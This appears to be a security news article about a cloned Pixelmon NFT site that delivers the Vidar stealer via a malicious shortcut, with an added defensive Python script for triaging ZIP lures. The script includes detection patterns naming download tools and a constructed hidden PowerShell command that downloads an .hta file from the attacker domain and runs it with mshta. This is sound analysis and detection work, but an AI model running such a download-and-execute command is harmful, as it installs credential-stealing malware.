A fake Pixelmon NFT site lures fans with free tokens and collectibles while infecting them with malware that steals cryptocurrency wallets.
Pixelmon is a popular NFT project whose roadmap includes an online metaverse game in which players use their Pixelmon pets to gather, train and fight other players.
With nearly 200,000 Twitter followers and over 25,000 Discord members, the project has received a lot of attention.
Impersonating the Pixelmon project
To take advantage of this interest, the threat actor copied the legitimate pixelmon.club website and created a fake version at pixelmon[.]pw to distribute malware.
The site is almost a replica of the legitimate one, but instead of a demo of the project's game, the malicious site serves an executable that installs password-stealing malware on the visitor's device.
At the moment the site offers a file called Installer.zip, which contains executables that appear to be corrupted and do not infect users with malware.
However, MalwareHunterTeam, who first discovered the malicious site, was able to find other malicious files distributed by it, which shows which malware is being spread.
One of the files distributed by the site is setup.zip, which contains a file named setup.lnk. Setup.lnk is a Windows shortcut that runs a PowerShell command to download the system32.hta file from pixelmon[.]pw.
When BleepingComputer tested these payloads, the system32.hta file downloaded Vidar, a password-stealing malware that is no longer as commonly used as it once was. This was confirmed by security researcher Fumik0_, who has analyzed this malware family before.
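The setup.zip / setup.lnk chain described above is the kind of lure an analyst triages before detonating anything. The Python below is an added example, not BleepingComputer's or MalwareHunterTeam's tooling: it opens an archive in memory, extracts printable strings from each entry (shortcut StringData is stored as UTF-16LE, so a plain ASCII `strings` pass misses it) and flags the download-cradle indicators the article describes: PowerShell, a hidden window, a web download, an .hta handed to mshta, and a remote URL. The archive and the shortcut body are constructed stand-ins, not the real setup.zip; the command line inside mirrors the described behaviour (PowerShell fetching system32.hta from pixelmon[.]pw) but its exact shape is an assumption.

```python
"""Triage helper: flag Windows shortcuts and download-cradle command lines inside a ZIP lure."""
import io
import re
import zipfile

# Indicators a defender looks for in a shortcut's target / arguments (case-insensitive).
INDICATORS = {
    "powershell":      re.compile(r"\bpowershell(?:\.exe)?\b", re.I),
    "hidden_window":   re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "download_cradle": re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b"
                                  r"|start-bitstransfer|\bcurl\b|\bwget\b", re.I),
    "hta_execution":   re.compile(r"\bmshta\b|\.hta\b", re.I),
    "remote_url":      re.compile(r"https?://", re.I),
    "encoded_payload": re.compile(r"-e(?:nc|ncodedcommand)\b|frombase64string", re.I),
}

ASCII_RUN = re.compile(rb"[\x20-\x7e]{6,}")           # like `strings`
UTF16_RUN = re.compile(rb"(?:[\x20-\x7e]\x00){6,}")   # like `strings -e l`


def extract_strings(data: bytes) -> list[str]:
    """Pull printable ASCII and UTF-16LE runs out of a binary blob.
    LNK StringData (target path, arguments) is UTF-16LE, so both encodings are scanned."""
    found = [m.group().decode("ascii") for m in ASCII_RUN.finditer(data)]
    found += [m.group().decode("utf-16-le") for m in UTF16_RUN.finditer(data)]
    return found


def score_command(text: str) -> list[str]:
    """Return the names of every indicator that matches the given string."""
    return [name for name, rx in INDICATORS.items() if rx.search(text)]


def triage_zip(zip_bytes: bytes) -> dict[str, list[str]]:
    """Map each archive entry to the sorted indicators found in it.
    Any .lnk entry is tagged 'shortcut_in_archive' regardless of its content,
    because a shortcut inside a 'setup' archive is itself a lure pattern."""
    report = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            hits = set()
            if info.filename.lower().endswith(".lnk"):
                hits.add("shortcut_in_archive")
            for s in extract_strings(zf.read(info)):
                hits.update(score_command(s))
            report[info.filename] = sorted(hits)
    return report


def build_sample_zip() -> bytes:
    """Build a CONSTRUCTED stand-in for setup.zip (not the real lure).
    The shortcut body is not a valid LNK: it carries the LNK magic and ShellLink CLSID
    followed by the command text as UTF-16LE, which is enough for string-based triage.
    The command line is an assumption about the shape of the real one."""
    cmd = ('powershell.exe -w hidden -c "Invoke-WebRequest http://pixelmon[.]pw/system32.hta '
           '-OutFile $env:TEMP\\system32.hta; mshta $env:TEMP\\system32.hta"')
    header = (b"L\x00\x00\x00"                                                       # HeaderSize 0x4C
              + b"\x01\x14\x02\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x46")  # ShellLink CLSID
    lnk = header.ljust(0x4C, b"\x00") + cmd.encode("utf-16-le")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("setup.lnk", lnk)
        zf.writestr("readme.txt", "Thanks for downloading the Pixelmon demo!")  # benign decoy entry
    return buf.getvalue()


if __name__ == "__main__":
    for name, hits in triage_zip(build_sample_zip()).items():
        print(f"{name}: {', '.join(hits) or 'clean'}")
```

Run it on a real archive by replacing `build_sample_zip()` with the bytes of the downloaded file; a shortcut that lights up `powershell`, `download_cradle` and `hta_execution` together should never be double-clicked, and the extracted URL goes straight into blocklists.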
When executed, the attacker's Vidar sample connects to a Telegram channel to obtain the IP address of the malware's command and control server.
The malware then retrieves a configuration command from the C2 and downloads further modules used to steal data from the infected device.
Vidar can steal passwords from browsers and applications, search the computer for files matching particular names, and upload those files to the attacker.
As the malware configuration below shows, the C2 instructs the malware to search for and steal various files, such as text files, cryptocurrency wallets, backups, code, password files, and authentication files.
Since this is an NFT site, visitors are expected to have a cryptocurrency wallet installed on their computer, which is why the threat actors focus on finding and stealing files related to cryptocurrencies.
The site is not currently distributing a working payload, but BleepingComputer has seen evidence that the threat actors have been modifying the site over the past few days, as a payload that was available two days ago is no longer available.
Given this activity, the campaign is likely to remain active, and functional payloads are expected to be added soon.
NFT projects are overrun with scams designed to steal cryptocurrency, so always make sure the URL you are visiting actually belongs to the project you are interested in.
In addition, do not run executables from unknown websites without first scanning them with antivirus software or VirusTotal.